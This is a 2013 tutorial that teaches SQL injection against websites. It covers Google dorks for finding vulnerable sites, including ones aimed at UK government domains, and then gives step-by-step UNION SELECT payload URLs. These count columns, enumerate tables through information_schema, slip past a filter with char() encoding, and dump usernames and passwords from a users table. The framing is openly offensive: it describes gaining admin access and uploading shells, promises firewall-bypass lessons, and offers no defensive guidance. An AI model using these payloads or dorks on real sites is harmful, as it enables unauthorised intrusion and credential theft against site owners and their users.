Basic Website Database In-Breaking via SLQ Injection

2013, Harry Kehoe admin@kehoesecurity.com All rights reserved. All rights reserved. No parts of this publication may be reproduced, Stored in a retrieval system, or transmitted in any form Or by any means, without the prior permission in writing of the publisher.

2013, Harry Kehoe

What is SQL injection? Structured Query Language (SQL) injection is a method hackers use to effectively exploit vulnerable columns within an SQL Database. With SQL injection methods hackers can force the database to display any information, within the databases hosted on server, such as usernames and passwords. This is one of the most common methods hackers use to break into a websites servers, they gain the administrators username and password, and then upload a shell via the administrative panel. With this shell hackers may be able to root, backdoor and symlink the server, basically have total control over all servers hosted on the same network. Google Dorks Before we plunge into the SQL injection tutorial I will first explain how Hackers scan the internet for SQL injection vulnerable sites. They use searches from engines such as: Google, yahoo, Bing and Ask Jeeves. Hackers often refer to these types of searches as dorks. Examples: inurl:index.php?id= inurl:page.php?id= inurl:payment.php?payment_id= site:.gov.uk inurl:index.php?id=

The search inurl: is telling the search engine to look for any Universal Resource Locator (URL or Link) for the following information. In the last example note I added a query site: this searches for websites with the domain name ending in the following information. Thus the last example would search for UK Government websites with SQL parameters. Is it vulnerable? example.com/index.php?id=23 index.php is the page and ?id= is the SQL parameter we are trying to exploit. To test if the platform is vulnerable you must a modify the SQL parameter to ?id=23 or ?id=23 Four things may happen: 1. The webpage has no change and the URL stays to ?id=1 - Site is Secure 2. The sends your browser to another(usually index) page Site is Secure 3. The display of the website is change and items are missing May be vulnerable 4. An error message You have an error in your SQL syntax may occur Vulnerable The next step is to find out how many columns there are within the Database.

2013, Harry Kehoe

Finding Column Count The first step to this multi-step systematic attack on the SQL databases is to discover how many columns there are in the database. To do this we must send the database the order by command by modifying the URL. example.com/index.php?id=23+order+by+1 + represents a space, it makes the code look clearer and easier to read rather than %20 if you only use a space. order+by is the statement we use to check the column. simply tells the website we are giving an SQL command. The number at the end is the column number, once you use the command on the website you will notice the site goes back to normal like it was before we checked if it was vulnerable, this is good. Now we will increase the number at the end of the command and keep going until we find an error. example.com/index.php?id=23+order+by+1 example.com/index.php?id=23+order+by+2 example.com/index.php?id=23+order+by+3 example.com/index.php?id=23+order+by+4 example.com/index.php?id=23+order+by+5 example.com/index.php?id=23+order+by+6 No Error No Error No Error No Error No Error Error

As you can see we get an error at column 6, this means there is no column 6 thus there are 5 columns in the database. Some Databases will have a lot of columns and some not as much, the most columns I have ever seen was 120 however this is very rare, so I suggest guessing in multiples 5. Finding the Vulnerable Columns Once we know how many columns there are we need to know what ones are vulnerable, these are ones we can see on the page. To see the vulnerable columns we must change the parameter value to null and use the Union Select command. There are two ways of changing the parameter value to null, I simply change the value to null like so: index.php?id=null But there are others who change the value to a negative, negative values are impossible thus give null. Example: index.php?id=-23

2013, Harry Kehoe

From this point you send the Union Select command as follows: index.php?id=null+union+select+1,2,3,4,5-As you can see here we are selecting all the columns in the Database (1-5) and now on the page index.php we will see numbers in random places around the page. These numbers are the numbers of the vulnerable columns. I can see a 2 at the top of my page so I know that column 2 is vulnerable to SQL injection. Extracting Information The ways in which we can extract information from the database changes depending on what version of MySQL it runs on. To test what version we are injecting we simply put the Version() command in place of the vulnerable column: index.php?id=null+union+select+1,Version(),3,4,5 Now on your page you will notice that the column number you are injecting has changed to a number such as 5.0.1.6 this is the version. If the version you are injecting is below 5 then you will have to use error based injection which I will not cover in this article. From now on I recommend you copy and paste the website URL to a notepad document and edit it there as we will be tampering with it a lot and will get very messy. At this point we need to find the names of the tables in the database, we do this by using a number of functions: 1. group_concat(table_name) This just tells the database to print the table names. 2. from+information_schema.tables All tables will be from information_schema db. 3. +where+table_schema=database() Commanding to get tables from current database. So now we take our vulnerable column and replace it with group_concat(table_name) and we will add +from+information_schema.tables+where+table_schema=database() after our column count: Example.com/index.php?id=null+union+select+1,group_concat(table_name),3,5+from+information_ schema.tables+where+table_schemas=database()-The page should now list all the tables within the current database. Sometimes it will produce a nice clean and tidy list but in other cases it will be messy, all over the place, and unreadable. To solve this add the command ,0x0a inside the brackets after table_name like so: Example.com/index.php?id=null+union+select+1,group_concat(table_name),3,4,5+from+information _schema.tables+where+table_schemas=database() Now my list is very neat, tidy and readable.

2013, Harry Kehoe

In my list I have a users table. To receive column names from that table we change a few functions from getting the table names: group_concat(column_name) instead of table_name and information_schema.columns instead of .tables and we add +where+table_name=users the URL is now like so: Example.com/index.php?id=null+union+select+1,group_concat(column_name),3,4,5+from+informati on_schema.columns+where+table_name=users In some situations, like mine, you may get an error here. To bypass this method of security we will change the table name to an ASCII value. Simply search the web for string to ASCII converter and you will find a site that can do the conversion for you. So my ASCII value for users is: 117 115 101 114 115 to add this into our injection we will set it out like this: char(117,115,101,114,115) Example.com/index.php?id=null+union+select+1,group_concat(column_name),3,4,5+from+informati on_schema.columns+where+table_name=char(117,115,101,114,115) Now I can see some very important columns: Username, Password and ID. Extracting Data The next step is to extract the data; Username, Password ID; and to do this we group_concat the columns however if we just use the function group_concat(Username, Password, ID) the information will be displayed in a single line and without anything separating the 3 separate pieces of information. To solve this we use the function: group_concat(Username, 0x3a, Password, 0x3a, ID, 0x0a) You may be wondering what the 0x3a and 0x0a means, I will explain. 0x3a: this simply means colon, so lets pretend the username is Harry, the password is Kehoe and the ID is 1, the data will display like this Harry:Kehoe:1. 0x0a just means new line, so the data will be shown in a big list. We also add +from+tablenamehere after the column count. My URL now looks like this: Example.com/index.php?id=null+union+select+1,group_concat(Username, 0x3a, Password, 0x3a, ID, 0x0a),3,4,5+from+Users Now you will have the username, password and Id of the users on the website. That is the basic part of the tutorial completed. In my next tutorial I will explain the procedure in extracting data from other databases hosted on same server and latterly professional Web Application Firewall bypassing, to exploit parameters that may seem not vulnerable.

2013, Harry Kehoe